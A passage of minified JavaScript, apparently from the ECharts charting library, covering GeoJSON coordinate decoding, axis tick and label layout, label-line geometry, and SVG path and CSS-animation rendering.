i=0;i<t.length;i++)t[i]=Kw(t[i],e[i],n)}function Kw(t,e,n){for(var i=[],r=e[0],o=e[1],a=0;a<t.length;a+=2){var s=t.charCodeAt(a)-64,l=t.charCodeAt(a+1)-64;s=s>>1^-(1&s),l=l>>1^-(1&l),r=s+=r,o=l+=o,i.push([s/n,l/n])}return i}function $w(t,e){return V(H((t=function(t){if(!t.UTF8Encoding)return t;var e=t,n=e.UTF8Scale;return null==n&&(n=1024),E(e.features,function(t){var e=t.geometry,i=e.encodeOffsets,r=e.coordinates;if(i)switch(e.type){case"LineString":e.coordinates=Kw(r,i,n);break;case"Polygon":case"MultiLineString":qw(r,i,n);break;case"MultiPolygon":E(r,function(t,e){return qw(t,i[e],n)})}}),e.UTF8Encoding=!1,e}(t)).features,function(t){return t.geometry&&t.properties&&t.geometry.coordinates.length>0}),function(t){var n=t.properties,i=t.geometry,r=[];switch(i.type){case"Polygon":var o=i.coordinates;r.push(new Yw(o[0],o.slice(1)));break;case"MultiPolygon":E(i.coordinates,function(t){t[0]&&r.push(new Yw(t[0],t.slice(1)))});break;case"LineString":r.push(new Xw([i.coordinates]));break;case"MultiLineString":r.push(new Xw(i.coordinates))}var a=new jw(n[e||"name"],r,n.cp);return a.properties=n,a})}var Qw=Object.freeze({__proto__:null,linearMap:Ro,round:function(t,e,n){return null==e&&(e=10),zo(t,e,n)},asc:Eo,getPrecision:Vo,getPrecisionSafe:Fo,getPixelPrecision:function(t,e){var n=Co(Ao(t[1]-t[0])/Po),i=ko(Ao(To(e[1]-e[0]))/Po),r=So(Mo(-n+i,0),20);return isFinite(r)?r:20},getPercentWithPrecision:function(t,e,n){return t[e]&&Go(t,n)[e]||0},parsePercent:No,MAX_SAFE_INTEGER:Uo,remRadian:Zo,isRadianAroundZero:Yo,parseDate:jo,quantity:qo,quantityExponent:Ko,nice:$o,quantile:function(t,e){var n=(t.length-1)*e+1,i=Co(n),r=+t[i-1],o=n-i;return o?r+o*(t[i]-r):r},reformIntervals:function(t){t.sort(function(t,e){return s(t,e,0)?-1:1});for(var e=-1/0,n=1,i=0;i<t.length;){for(var r=t[i].interval,o=t[i].close,a=0;a<2;a++)r[a]<=e&&(r[a]=e,o[a]=a?1:1-n),e=r[a],n=o[a];r[0]===r[1]&&o[0]*o[1]!==1?t.splice(i,1):i++}return t;function s(t,e,n){return t.interval[n]<e.interval[n]||t.interval[n]===e.interval[n]&&(t.close[n]-e.close[n]===(n?-1:1)||!n&&s(t,e,1))}},isNumeric:Jo,numericToNumber:Qo}),Jw=Object.freeze({__proto__:null,parse:jo,format:Pd,roundTime:Od}),tS=Object.freeze({__proto__:null,extendShape:Yh,extendPath:jh,makePath:$h,makeImage:Qh,mergePath:tp,resizePath:ep,createIcon:hp,updateProps:Bh,initProps:zh,getTransform:rp,clipPointsByRect:up,clipRectByRect:cp,registerShape:qh,getShapeClass:Kh,Group:ho,Image:Hl,Text:Ql,Circle:Ec,Ellipse:Fc,Sector:eh,Ring:ih,Polygon:ah,Polyline:lh,Rect:jl,Line:hh,BezierCurve:gh,Arc:yh,IncrementalDisplayable:Lh,CompoundPath:mh,LinearGradient:xh,RadialGradient:bh,BoundingRect:Ue}),eS=Object.freeze({__proto__:null,addCommas:jd,toCamelCase:qd,normalizeCssArray:Kd,encodeHTML:ae,formatTpl:tf,getTooltipMarker:ef,formatTime:function(t,e,n){"week"!==t&&"month"!==t&&"quarter"!==t&&"half-year"!==t&&"year"!==t||(t="MM-dd\nyyyy");var i=jo(e),r=n?"getUTC":"get",o=i[r+"FullYear"](),a=i[r+"Month"]()+1,s=i[r+"Date"](),l=i[r+"Hours"](),u=i[r+"Minutes"](),c=i[r+"Seconds"](),h=i[r+"Milliseconds"]();return t=t.replace("MM",Id(a,2)).replace("M",a).replace("yyyy",o).replace("yy",Id(o%100+"",2)).replace("dd",Id(s,2)).replace("d",s).replace("hh",Id(l,2)).replace("h",l).replace("mm",Id(u,2)).replace("m",u).replace("ss",Id(c,2)).replace("s",c).replace("SSS",Id(h,3))},capitalFirst:function(t){return t?t.charAt(0).toUpperCase()+t.substr(1):t},truncateText:function(t,e,n,i,r){var o={};return ps(o,t,e,n,i,r),o.text},getTextRect:function(t,e,n,i,r,o,a,s){return new Ql({style:{text:t,font:e,align:n,verticalAlign:i,padding:r,rich:o,overflow:a?"truncate":null,lineHeight:s}}).getBoundingRect()}}),nS=Object.freeze({__proto__:null,map:V,each:E,indexOf:R,inherits:N,reduce:F,filter:H,bind:U,curry:Z,isArray:Y,isString:j,isObject:$,isFunction:X,extend:A,defaults:L,clone:C,merge:I}),iS=Ta(),rS=Ta(),oS=1,aS=2;function sS(t){return{out:{noPxChangeTryDetermine:[]},kind:t}}function lS(t,e){var n=t.getLabelModel().get("customValues");if(n){var i=t.scale;return{labels:V(cS(n,i),function(e,n){return{formattedLabel:$b(t)(e,n),rawLabel:i.getLabel(e),tick:e}})}}return"category"===t.type?function(t,e){var n=t.getLabelModel(),i=hS(t,n,e);return!n.get("show")||t.scale.isBlank()?{labels:[]}:i}(t,e):function(t){var e=t.scale.getTicks(),n=$b(t);return{labels:V(e,function(e,i){return{formattedLabel:n(e,i),rawLabel:t.scale.getLabel(e),tick:e}})}}(t)}function uS(t,e,n){var i=t.scale,r=t.getTickModel().get("customValues");return r?{ticks:cS(r,i)}:"category"===t.type?function(t,e){var n,i,r=pS(t),o=Jb(e),a=gS(r,o);if(a)return a;e.get("show")&&!t.scale.isBlank()||(n=[]);if(X(o))n=_S(t,o,!0);else if("auto"===o){var s=hS(t,t.getLabelModel(),sS(aS));i=s.labelCategoryInterval,n=V(s.labels,function(t){return t.tick})}else n=_S(t,i=o,!0);return vS(r,o,{ticks:n,tickCategoryInterval:i})}(t,e):{ticks:i.getTicks(n)}}function cS(t,e){var n=e.getExtent(),i=[];return E(t,function(t){(t=e.parse(t))>=n[0]&&t<=n[1]&&i.push(t)}),Ga(i,Ua,null),Eo(i),V(i,function(t){return{value:t}})}function hS(t,e,n){var i,r,o=dS(t),a=Jb(e),s=n.kind===oS;if(!s){var l=gS(o,a);if(l)return l}X(a)?i=_S(t,a,!1):(r="auto"===a?function(t,e){if(e.kind===oS){var n=t.calculateCategoryInterval(e);return e.out.noPxChangeTryDetermine.push(function(){return rS(t).autoInterval=n,!0}),n}var i=rS(t).autoInterval;return null!=i?i:rS(t).autoInterval=t.calculateCategoryInterval(e)}(t,n):a,i=_S(t,r,!1));var u={labels:i,labelCategoryInterval:r};return s?n.out.noPxChangeTryDetermine.push(function(){return vS(o,a,u),!0}):vS(o,a,u),u}var pS=fS("axisTick"),dS=fS("axisLabel");function fS(t){return function(e){return rS(e)[t]||(rS(e)[t]={list:[]})}}function gS(t,e){for(var n=0;n<t.list.length;n++)if(t.list[n].key===e)return t.list[n].value}function vS(t,e,n){return t.list.push({key:e,value:n}),n}function yS(t,e,n){return null==mS(t,e,n)}function mS(t,e,n){var i=iS(t.model),r=t.getExtent(),o=i.lastAutoInterval,a=i.lastTickCount;if(null!=o&&null!=a&&Math.abs(o-e)<=1&&Math.abs(a-n)<=1&&o>e&&i.axisExtent0===r[0]&&i.axisExtent1===r[1])return o;i.lastTickCount=n,i.lastAutoInterval=e,i.axisExtent0=r[0],i.axisExtent1=r[1]}function _S(t,e,n){var i=$b(t),r=t.scale,o=[],a=X(e);return Cb(r,a?0:e,function(t,s){var l=r.getLabel(t);if(a){var u=!!e(t.value,l);if(t.offInterval=!u,!u&&!s)return}o.push(n?t:{formattedLabel:i(t),rawLabel:l,tick:t})}),o}function xS(t,e){e=e||{};var n,i={w:NaN,w2:NaN},r=t.scale,o=e.fromStat,a=e.min,s=(n=hb(r,3))[1]-n[0];ia(s)||(s=NaN);var l=t.getExtent(),u=To(l[1]-l[0]);return xb(r)?function(t,e,n,i){var r=e.onBand,o=n+(r?1:0);0===o&&(o=1),t.w=i/o,!r&&n&&i&&(t.w2=t.w*n/i)}(i,t,s,u):o&&function(t,e,n,i,r){0;var o=!1,a=-1/0;E(r.key?[pw(e,r.key)]:function(t,e){var n=[];return dw(t.model.ecModel,function(t){for(var i=0;i<e.length;i++)e[i]&&t.serByIdx[e[i].seriesIndex]&&n.push(fw(t))}),n}(e,r.sers||[]),function(t){var e=t.liPosMinGap;null!=e&&(e>0?(e>a&&(a=e),o=!1):-2===e&&(o=!0))}),ia(n)&&n>0&&ia(a)?(t.w=i/n*a,t.w2=a):o&&(t.w=.8*i,t.w2=t.w*n/i)}(i,t,s,u,o),null!=a&&(i.w=ia(i.w)?Mo(a,i.w):a),i}var bS=[0,1],wS=function(){function t(t,e,n){this.onBand=!1,this.inverse=!1,this.dim=t,this.scale=e,this._extent=n||[0,0]}return t.prototype.contain=function(t){var e=this._extent,n=Math.min(e[0],e[1]),i=Math.max(e[0],e[1]);return t>=n&&t<=i},t.prototype.containData=function(t){return this.scale.contain(this.scale.parse(t))},t.prototype.getExtent=function(){return this._extent.slice()},t.prototype.setExtent=function(t,e){var n=this._extent;n[0]=t,n[1]=e},t.prototype.dataToCoord=function(t,e){var n=this.scale;return Ro(t=n.normalize(n.parse(t)),bS,SS(this),e)},t.prototype.coordToData=function(t,e){var n=Ro(t,SS(this),bS,e);return this.scale.scale(n)},t.prototype.pointToData=function(t,e){},t.prototype.getTicksCoords=function(t){var e=(t=t||{}).tickModel||this.getTickModel(),n=V(uS(this,e,{breakTicks:t.breakTicks,pruneByBreak:t.pruneByBreak}).ticks,function(t){return{coord:this.dataToCoord(rw(this.scale,t)),tick:t}},this),i=function(t,e,n){var i=e.length;if(!t.onBand||n||!i)return!1;var r=xS(t).w;if(!r)return!1;E(e,function(t){t.coord-=r/2});var o=t.scale.getExtent(),a=e[i-1];a.tick.offInterval&&e.pop();return e.push({coord:a.coord+r,tick:{value:o[1]+1}}),!0}(this,n,e.get("alignWithLabel"));return V(n,function(t){return{coord:t.coord,tickValue:t.tick.value,onBand:i}})},t.prototype.getMinorTicksCoords=function(){if(xb(this.scale))return[];var t=this.model.getModel("minorTick").get("splitNumber");return t>0&&t<100||(t=5),V(this.scale.getMinorTicks(t),function(t){return V(t,function(t){return{coord:this.dataToCoord(t),tickValue:t}},this)},this)},t.prototype.getViewLabels=function(t){return lS(this,t=t||sS(aS)).labels},t.prototype.getLabelModel=function(){return this.model.getModel("axisLabel")},t.prototype.getTickModel=function(){return this.model.getModel("axisTick")},t.prototype.getBandWidth=function(){return xS(this,{min:1}).w},t.prototype.calculateCategoryInterval=function(t){return function(t,e){var n=e.kind,i=function(t){var e=t.getLabelModel();return{axisRotate:t.getRotate?t.getRotate():t.isHorizontal&&!t.isHorizontal()?90:0,labelRotate:e.get("rotate")||0,font:e.getFont()}}(t),r=$b(t),o=(i.axisRotate-i.labelRotate)/180*Math.PI,a=t.scale,s=a.getExtent(),l=a.count();if(s[1]-s[0]<1)return 0;var u=1;l>40&&(u=Math.max(1,Math.floor(l/40)));for(var c=s[0],h=t.dataToCoord(c+1)-t.dataToCoord(c),p=Math.abs(h*Math.cos(o)),d=Math.abs(h*Math.sin(o)),f=0,g=0;c<=s[1];c+=u){var v,y,m=Zr(r({value:c}),i.font,"center","top");v=1.3*m.width,y=1.3*m.height,f=Math.max(f,v,7),g=Math.max(g,y,7)}var _=f/p,x=g/d;isNaN(_)&&(_=1/0),isNaN(x)&&(x=1/0);var b=Math.max(0,Math.floor(Math.min(_,x)));if(n===oS)return e.out.noPxChangeTryDetermine.push(U(yS,null,t,b,l)),b;var w=mS(t,b,l);return null!=w?w:b}(this,t=t||sS(aS))},t}();function SS(t){var e=t.getExtent();if(t.onBand){var n=(e[1]-e[0])/t.scale.count()/2;e[0]+=n,e[1]-=n}return e}function MS(t,e,n,i,r,o,a,s){var l=r-t,u=o-e,c=n-t,h=i-e,p=Math.sqrt(c*c+h*h),d=(l*(c/=p)+u*(h/=p))/p;s&&(d=Math.min(Math.max(d,0),1)),d*=p;var f=a[0]=t+d*c,g=a[1]=e+d*h;return Math.sqrt((f-r)*(f-r)+(g-o)*(g-o))}var TS=new Ae,kS=new Ae,CS=new Ae,IS=new Ae,DS=new Ae,AS=[],PS=new Ae;function LS(t,e){if(e<=180&&e>0){e=e/180*Math.PI,TS.fromArray(t[0]),kS.fromArray(t[1]),CS.fromArray(t[2]),Ae.sub(IS,TS,kS),Ae.sub(DS,CS,kS);var n=IS.len(),i=DS.len();if(!(n<.001||i<.001)){IS.scale(1/n),DS.scale(1/i);var r=IS.dot(DS);if(Math.cos(e)<r){var o=MS(kS.x,kS.y,CS.x,CS.y,TS.x,TS.y,AS,!1);PS.fromArray(AS),PS.scaleAndAdd(DS,o/Math.tan(Math.PI-e));var a=CS.x!==kS.x?(PS.x-kS.x)/(CS.x-kS.x):(PS.y-kS.y)/(CS.y-kS.y);if(isNaN(a))return;a<0?Ae.copy(PS,kS):a>1&&Ae.copy(PS,CS),PS.toArray(t[1])}}}}function OS(t,e,n){if(n<=180&&n>0){n=n/180*Math.PI,TS.fromArray(t[0]),kS.fromArray(t[1]),CS.fromArray(t[2]),Ae.sub(IS,kS,TS),Ae.sub(DS,CS,kS);var i=IS.len(),r=DS.len();if(!(i<.001||r<.001))if(IS.scale(1/i),DS.scale(1/r),IS.dot(e)<Math.cos(n)){var o=MS(kS.x,kS.y,CS.x,CS.y,TS.x,TS.y,AS,!1);PS.fromArray(AS);var a=Math.PI/2,s=a+Math.acos(DS.dot(e))-n;if(s>=a)Ae.copy(PS,CS);else{PS.scaleAndAdd(DS,o/Math.tan(Math.PI/2-s));var l=CS.x!==kS.x?(PS.x-kS.x)/(CS.x-kS.x):(PS.y-kS.y)/(CS.y-kS.y);if(isNaN(l))return;l<0?Ae.copy(PS,kS):l>1&&Ae.copy(PS,CS)}PS.toArray(t[1])}}}function RS(t,e,n,i){var r="normal"===n,o=r?t:t.ensureState(n);o.ignore=e;var a=i.get("smooth");a=!0===a?.3:Math.max(+a,0)||0,o.shape=o.shape||{},o.shape.smooth=a;var s=i.getModel("lineStyle").getLineStyle();r?t.useStyle(s):o.style=s}function NS(t,e){var n=e.smooth,i=e.points;if(i)if(t.moveTo(i[0][0],i[0][1]),n>0&&i.length>=3){var r=Ft(i[0],i[1]),o=Ft(i[1],i[2]);if(!r||!o)return t.lineTo(i[1][0],i[1][1]),void t.lineTo(i[2][0],i[2][1]);var a=Math.min(r,o)*n,s=Wt([],i[1],i[0],a/r),l=Wt([],i[1],i[2],a/o),u=Wt([],s,l,.5);t.bezierCurveTo(s[0],s[1],s[0],s[1],u[0],u[1]),t.bezierCurveTo(l[0],l[1],l[0],l[1],i[2][0],i[2][1])}else for(var c=1;c<i.length;c++)t.lineTo(i[c][0],i[c][1])}var BS=["label","labelLine","layoutOption","priority","defaultAttr","marginForce","minMarginForce","marginDefault","suggestIgnore"];function zS(t,e,n){n=n||3,e?t.dirty|=n:t.dirty&=~n}function ES(t,e){return e=e||3,null==t.dirty||!!(t.dirty&e)}function VS(t){if(t)return ES(t)&&FS(t,t.label,t),t}function FS(t,e,n){var i=e.getComputedTransform();t.transform=Sp(t.transform,i);var r=t.localRect=wp(t.localRect,e.getBoundingRect()),o=e.style,a=o.margin,s=n&&n.marginForce,l=n&&n.minMarginForce,u=n&&n.marginDefault,c=o.__marginType;null==c&&u&&(a=u,c=Wp.textMargin);for(var h=0;h<4;h++)HS[h]=c===Wp.minMargin&&l&&null!=l[h]?l[h]:s&&null!=s[h]?s[h]:a?a[h]:0;c===Wp.textMargin&&fp(r,HS,!1,!1);var p=t.rect=wp(t.rect,r);return i&&p.applyTransform(i),c===Wp.minMargin&&fp(p,HS,!1,!1),t.axisAligned=xp(i),(t.label=t.label||{}).ignore=e.ignore,zS(t,!1),zS(t,!0,2),t}var HS=[0,0,0,0];function GS(t,e){if(t){t.label.x+=e.x,t.label.y+=e.y,t.label.markRedraw();var n=t.transform;n&&(n[4]+=e.x,n[5]+=e.y);var i=t.rect;i&&(i.x+=e.x,i.y+=e.y);var r=t.obb;r&&r.fromBoundingRect(t.localRect,n)}}function WS(t,e){for(var n=0;n<BS.length;n++){var i=BS[n];null==t[i]&&(t[i]=e[i])}return VS(t)}function US(t){var e=t.obb;return e&&!ES(t,2)||(t.obb=e=e||new Ah,e.fromBoundingRect(t.localRect,t.transform),zS(t,!1,2)),e}function ZS(t,e,n,i){return!(!t||!e)&&(!(t.label&&t.label.ignore||e.label&&e.label.ignore)&&(!!t.rect.intersect(e.rect,n,i)&&(!(!t.axisAligned||!e.axisAligned)||US(t).intersect(US(e),n,i))))}var YS=Math.sin,XS=Math.cos,jS=Math.PI,qS=2*Math.PI,KS=180/jS,$S=function(){function t(){}return t.prototype.reset=function(t){this._start=!0,this._d=[],this._str="",this._p=Math.pow(10,t||4)},t.prototype.moveTo=function(t,e){this._add("M",t,e)},t.prototype.lineTo=function(t,e){this._add("L",t,e)},t.prototype.bezierCurveTo=function(t,e,n,i,r,o){this._add("C",t,e,n,i,r,o)},t.prototype.quadraticCurveTo=function(t,e,n,i){this._add("Q",t,e,n,i)},t.prototype.arc=function(t,e,n,i,r,o){this.ellipse(t,e,n,n,0,i,r,o)},t.prototype.ellipse=function(t,e,n,i,r,o,a,s){var l=a-o,u=!s,c=Math.abs(l),h=Ii(c-qS)||(u?l>=qS:-l>=qS),p=l>0?l%qS:l%qS+qS,d=!1;d=!!h||!Ii(c)&&p>=jS==!!u;var f=t+n*XS(o),g=e+i*YS(o);this._start&&this._add("M",f,g);var v=Math.round(r*KS);if(h){var y=1/this._p,m=(u?1:-1)*(qS-y);this._add("A",n,i,v,1,+u,t+n*XS(o+m),e+i*YS(o+m)),y>.01&&this._add("A",n,i,v,0,+u,f,g)}else{var _=t+n*XS(a),x=e+i*YS(a);this._add("A",n,i,v,+d,+u,_,x)}},t.prototype.rect=function(t,e,n,i){this._add("M",t,e),this._add("l",n,0),this._add("l",0,i),this._add("l",-n,0),this._add("Z")},t.prototype.closePath=function(){this._d.length>0&&this._add("Z")},t.prototype._add=function(t,e,n,i,r,o,a,s,l){for(var u=[],c=this._p,h=1;h<arguments.length;h++){var p=arguments[h];if(isNaN(p))return void(this._invalid=!0);u.push(Math.round(p*c)/c)}this._d.push(t+u.join(" ")),this._start="Z"===t},t.prototype.generateStr=function(){this._str=this._invalid?"":this._d.join(""),this._d=[]},t.prototype.getStr=function(){return this._str},t}(),QS="none",JS=Math.round;var tM=["lineCap","miterLimit","lineJoin"],eM=V(tM,function(t){return"stroke-"+t.toLowerCase()});function nM(t,e,n,i){var r=null==e.opacity?1:e.opacity;if(n instanceof Hl)t("opacity",r);else{if(function(t){var e=t.fill;return null!=e&&e!==QS}(e)){var o=ki(e.fill);t("fill",o.color);var a=null!=e.fillOpacity?e.fillOpacity*o.opacity*r:o.opacity*r;(i||a<1)&&t("fill-opacity",a)}else t("fill",QS);if(function(t){var e=t.stroke;return null!=e&&e!==QS}(e)){var s=ki(e.stroke);t("stroke",s.color);var l=e.strokeNoScale?n.getLineScale():1,u=l?(e.lineWidth||0)/l:0,c=null!=e.strokeOpacity?e.strokeOpacity*s.opacity*r:s.opacity*r,h=e.strokeFirst;if((i||1!==u)&&t("stroke-width",u),(i||h)&&t("paint-order",h?"stroke":"fill"),(i||c<1)&&t("stroke-opacity",c),e.lineDash){var p=Pm(n),d=p[0],f=p[1];d&&(f=JS(f||0),t("stroke-dasharray",d.join(",")),(f||i)&&t("stroke-dashoffset",f))}else i&&t("stroke-dasharray",QS);for(var g=0;g<tM.length;g++){var v=tM[g];if(i||e[v]!==Ol[v]){var y=e[v]||Ol[v];y&&t(eM[g],y)}}}else i&&t("stroke",QS)}}var iM="http://www.w3.org/2000/svg",rM="http://www.w3.org/1999/xlink",oM="ecmeta_";function aM(t){return document.createElementNS(iM,t)}function sM(t,e,n,i,r){return{tag:t,attrs:n||{},children:i,text:r,key:e}}function lM(t,e){var n=(e=e||{}).newline?"\n":"";return function t(e){var i=e.children,r=e.tag,o=e.attrs,a=e.text;return function(t,e){var n=[];if(e)for(var i in e){var r=e[i],o=i;!1!==r&&(!0!==r&&null!=r&&(o+='="'+r+'"'),n.push(o))}return"<"+t+" "+n.join(" ")+">"}(r,o)+("style"!==r?ae(a):a||"")+(i?""+n+V(i,function(e){return t(e)}).join(n)+n:"")+("</"+r+">")}(t)}function uM(t){return{zrId:t,shadowCache:{},patternCache:{},gradientCache:{},clipPathCache:{},defs:{},cssNodes:{},cssAnims:{},cssStyleCache:{},cssAnimIdx:0,shadowIdx:0,gradientIdx:0,patternIdx:0,clipPathIdx:0}}function cM(t,e,n,i){return sM("svg","root",{width:t,height:e,xmlns:iM,"xmlns:xlink":rM,version:"1.1",baseProfile:"full",viewBox:!!i&&"0 0 "+t+" "+e},n)}var hM=0;function pM(){return hM++}var dM={cubicIn:"0.32,0,0.67,0",cubicOut:"0.33,1,0.68,1",cubicInOut:"0.65,0,0.35,1",quadraticIn:"0.11,0,0.5,0",quadraticOut:"0.5,1,0.89,1",quadraticInOut:"0.45,0,0.55,1",quarticIn:"0.5,0,0.75,0",quarticOut:"0.25,1,0.5,1",quarticInOut:"0.76,0,0.24,1",quinticIn:"0.64,0,0.78,0",quinticOut:"0.22,1,0.36,1",quinticInOut:"0.83,0,0.17,1",sinusoidalIn:"0.12,0,0.39,0",sinusoidalOut:"0.61,1,0.88,1",sinusoidalInOut:"0.37,0,0.63,1",exponentialIn:"0.7,0,0.84,0",exponentialOut:"0.16,1,0.3,1",exponentialInOut:"0.87,0,0.13,1",circularIn:"0.55,0,1,0.45",circularOut:"0,0.55,0.45,1",circularInOut:"0.85,0,0.15,1"},fM="transform-origin";function gM(t,e,n){var i=A({},t.shape);A(i,e),t.buildPath(n,i);var r=new $S;return r.reset(Ei(t)),n.rebuildPath(r,1),r.generateStr(),r.getStr()}function vM(t,e){var n=e.originX,i=e.originY;(n||i)&&(t[fM]=n+"px "+i+"px")}var yM={fill:"fill",opacity:"opacity",lineWidth:"stroke-width",lineDashOffset:"stroke-dashoffset"};function mM(t,e){var n=e.zrId+"-ani-"+e.cssAnimIdx++;return e.cssAnims[n]=t,n}function _M(t){return j(t)?dM[t]?"cubic-bezier("+dM[t]+")":jn(t)?t:"":""}function xM(t,e,n,i){var r=t.animators,o=r.length,a=[];if(t instanceof mh){var s=function(t,e,n){var i,r,o=t.shape.paths,a={};if(E(o,function(t){var e=uM(n.zrId);e.animation=!0,xM(t,{},e,!0);var o=e.cssAnims,s=e.cssNodes,l=W(o),u=l.length;if(u){var c=o[r=l[u-1]];for(var h in c){var p=c[h];a[h]=a[h]||{d:""},a[h].d+=p.d||""}for(var d in s){var f=s[d].animation;f.indexOf(r)>=0&&(i=f)}}}),i){e.d=!1;var s=mM(a,n);return i.replace(r,s)}}(t,e,n);if(s)a.push(s);else if(!o)return}else if(!o)return;for(var l={},u=0;u<o;u++){var c=r[u],h=[c.getMaxTime()/1e3+"s"],p=_M(c.getClip().easing),d=c.getDelay();p?h.push(p):h.push("linear"),d&&h.push(d/1e3+"s"),c.getLoop()&&h.push("infinite");var f=h.join(" ");l[f]=l[f]||[f,[]],l[f][1].push(c)}function g(r){var o,a=r[1],s=a.length,l={},u={},c={},h="animation-timing-function";function p(t,e,n){for(var i=t.getTracks(),r=t.getMaxTime(),o=0;o<i.length;o++){var a=i[o];if(a.needsAnimate()){var s=a.keyframes,l=a.propName;if(n&&(l=n(l)),l)for(var u=0;u<s.length;u++){var c=s[u],p=Math.round(c.time/r*100)+"%",d=_M(c.easing),f=c.rawValue;(j(f)||K(f))&&(e[p]=e[p]||{},e[p][l]=c.rawValue,d&&(e[p][h]=d))}}}}for(var d=0;d<s;d++){(S=(w=a[d]).targetName)?"shape"===S&&p(w,u):!i&&p(w,l)}for(var f in l){var g={};Er(g,t),A(g,l[f]);var v=Vi(g),y=l[f][h];c[f]=v?{transform:v}:{},vM(c[f],g),y&&(c[f][h]=y)}var m=!0;for(var f in u){c[f]=c[f]||{};var _=!o;y=u[f][h];_&&(o=new gl);var x=o.len();o.reset(),c[f].d=gM(t,u[f],o);var b=o.len();if(!_&&x!==b){m=!1;break}y&&(c[f][h]=y)}if(!m)for(var f in c)delete c[f].d;if(!i)for(d=0;d<s;d++){var w,S;"style"===(S=(w=a[d]).targetName)&&p(w,c,function(t){return yM[t]})}var M,T=W(c),k=!0;for(d=1;d<T.length;d++){var C=T[d-1],I=T[d];if(c[C][fM]!==c[I][fM]){k=!1;break}M=c[C][fM]}if(k&&M){for(var f in c)c[f][fM]&&delete c[f][fM];e[fM]=M}if(H(T,function(t){return W(c[t]).length>0}).length)return mM(c,n)+" "+r[0]+" both"}for(var v in l){(s=g(l[v]))&&a.push(s)}if(a.length){var y=n.zrId+"-cls-"+pM();n.cssNodes["."+y]={animation:a.join(",")},e.class=y}}function bM(t,e,n,i){var r=JSON.stringify(t),o=n.cssStyleCache[r];o||(o=n.zrId+"-cls-"+pM(),n.cssStyleCache[r]=o,n.cssNodes["."+o+(i?":hover":"")]=t),e.class=e.class?e.class+" "+o:o}var wM=Math.round;function SM(t){return t&&j(t.src)}function MM(t){return t&&X(t.toDataURL)}function TM(t,e,n,i){nM(function(r,o){var a="fill"===r||"stroke"===r;a&&Bi(o)?BM(e,t,r,i):a&&Oi(o)?zM(n,t,r,i):t[r]=o,a&&i.ssr&&"none"===o&&(t["pointer-events"]="visible")},e,n,!1),function(t,e,n){var i=t.style;if(function(t){return t&&(t.shadowBlur||t.shadowOffsetX||t.shadowOffsetY)}(i)){var r=function(t){var e=t.style,n=t.getGlobalScale();return[e.shadowColor,(e.shadowBlur||0).toFixed(2),(e.shadowOffsetX||0).toFixed(2),(e.shadowOffsetY||0).toFixed(2),n[0],n[1]].join(",")}(t),o=n.shadowCache,a=o[r];if(!a){var s=t.getGlobalScale(),l=s[0],u=s[1];if(!l||!u)return;var c=i.shadowOffsetX||0,h=i.shadowOffsetY||0,p=i.shadowBlur,d=ki(i.shadowColor),f=d.opacity,g=d.color,v=p/2/l+" "+p/2/u;a=n.zrId+"-s"+n.shadowIdx++,n.defs[a]=sM("filter",a,{id:a,x:"-100%",y:"-100%",width:"300%",height:"300%"},[sM("feDropShadow","",{dx:c/l,dy:h/u,stdDeviation:v,"flood-color":g,"flood-opacity":f})]),o[r]=a}e.filter=zi(a)}}(n,t,i)}function kM(t,e){var n=_o(e);n&&(n.each(function(e,n){null!=e&&(t[(oM+n).toLowerCase()]=e+"")}),e.isSilent()&&(t[oM+"silent"]="true"))}function CM(t){return Ii(t[0]-1)&&Ii(t[1])&&Ii(t[2])&&Ii(t[3]-1)}function IM(t,e,n){if(e&&(!function(t){return Ii(t[4])&&Ii(t[5])}(e)||!CM(e))){var i=n?10:1e4;t.transform=CM(e)?"translate("+wM(e[4]*i)/i+" "+wM(e[5]*i)/i+")":function(t){return"matrix("+Di(t[0])+","+Di(t[1])+","+Di(t[2])+","+Di(t[3])+","+Ai(t[4])+","+Ai(t[5])+")"}(e)}}function DM(t,e,n){for(var i=t.points,r=[],o=0;o<i.length;o++)r.push(wM(i[o][0]*n)/n),r.push(wM(i[o][1]*n)/n);e.points=r.join(" ")}function AM(t){return!t.smooth}var PM,LM,OM={circle:[(PM=["cx","cy","r"],LM=V(PM,function(t){return"string"==typeof t?[t,t]:t}),function(t,e,n){for(var i=0;i<LM.length;i++){var r=LM[i],o=t[r[0]];null!=o&&(e[r[1]]=wM(o*n)/n)}})],polyline:[DM,AM],polygon:[DM,AM]};function RM(t,e){var n=t.style,i=t.shape,r=OM[t.type],o={},a=e.animation,s="path",l=t.style.strokePercent,u=e.compress&&Ei(t)||4;if(!r||e.willUpdate||r[1]&&!r[1](i)||a&&function(t){for(var e=t.animators,n=0;n<e.length;n++)if("shape"===e[n].targetName)return!0;return!1}(t)||l<1){var c=!t.path||t.shapeChanged();t.path||t.createPathProxy();var h=t.path;c&&(h.beginPath(),t.buildPath(h,t.shape),t.pathUpdated());var p=h.getVersion(),d=t,f=d.__svgPathBuilder;d.__svgPathVersion===p&&f&&l===d.__svgPathStrokePercent||(f||(f=d.__svgPathBuilder=new $S),f.reset(u),h.rebuildPath(f,l),f.generateStr(),d.__svgPathVersion=p,d.__svgPathStrokePercent=l),o.d=f.getStr()}else{s=t.type;var g=Math.pow(10,u);r[0](i,o,g)}return IM(o,t.transform),TM(o,n,t,e),kM(o,t),e.animation&&xM(t,o,e),e.emphasis&&function(t,e,n){if(!t.ignore)if(t.isSilent())bM(u={"pointer-events":"none"},e,n,!0);else{var i=t.states.emphasis&&t.states.emphasis.style?t.states.emphasis.style:{},r=i.fill;if(!r){var o=t.style&&t.style.fill,a=t.states.select&&t.states.select.style&&t.states.select.style.fill,s=t.currentStates.indexOf("select")>=0&&a||o;s&&(r=Si(s))}var l=i.lineWidth;l&&(l/=!i.strokeNoScale&&t.transform?t.transform[0]:1);var u={cursor:"pointer"};r&&(u.fill=r),i.stroke&&(u.stroke=i.stroke),l&&(u["stroke-width"]=l),bM(u,e,n,!0)}}(t,o,e),sM(s,t.id+"",o)}function NM(t,e){return t instanceof Bl?RM(t,e):t instanceof Hl?function(t,e){var n=t.style,i=n.image;if(i&&!j(i)&&(SM(i)?i=i.src:MM(i)&&(i=i.toDataURL())),i){var r=n.x||0,o=n.y||0,a={href:i,width:n.width,height:n.height};return r&&(a.x=r),o&&(a.y=o),IM(a,t.transform),TM(a,n,t,e),kM(a,t),e.animation&&xM(t,a,e),sM("image",t.id+"",a)}}(t,e):t instanceof El?function(t,e){var n=t.style,i=n.text;if(null!=i&&(i+=""),i&&!isNaN(n.x)&&!isNaN(n.y)){var 